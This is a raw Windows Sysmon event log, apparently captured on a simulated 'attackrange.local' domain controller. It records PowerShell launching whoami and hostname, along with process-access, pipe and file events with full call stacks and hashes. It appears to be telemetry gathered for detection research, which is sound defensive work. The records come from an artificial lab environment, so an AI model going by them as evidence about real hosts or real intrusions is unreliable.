i.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889
\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000024707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.432{4DB9351A-A31C-60D3-2606-00000000CF01}1680C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft 
Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000024706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31C-60D3-2506-00000000CF01}2280C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.412{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A31C-60D3-2506-00000000CF01}2280C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024701Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.412{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:48.412{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31C-60D3-2506-00000000CF01}2280C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9ca36d54(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb114758
89\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beabb9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64) 154100x800000000000000024699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:48.417{4DB9351A-A31C-60D3-2506-00000000CF01}2280C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft 
Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000024788Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.771{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024787Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.771{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.724{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.724{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x800000000000000024784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.724{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B921942AABED6E34BBAB122087C506AF,SHA256=B58F824C96A99919F6DE8E503B7AC36722258219B581F14654B749C188752EBE,IMPHASH=00000000000000000000000000000000falsetrue 17141700x800000000000000024783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:49.709{4DB9351A-A31D-60D3-2A06-00000000CF01}5208\PSHost.132689561896224565.5208.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.693{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4ixmw0td.4aq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.693{4DB9351A-A31D-60D3-2A06-00000000CF01}5208ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_derk2emu.yik.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.677{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_derk2emu.yik.ps12021-06-23 21:09:49.677 10341000x800000000000000024779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.662{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.646{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=999E9372D02667112D6C1CE01242AF1E,SHA256=9BCD8E64553F3A4FE4259744776ED2CF149648D214C992F9039427976E3ADA54,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.615{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A31D-60D3-2A06-00000000CF01}5208C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:09:49.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:49.615{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
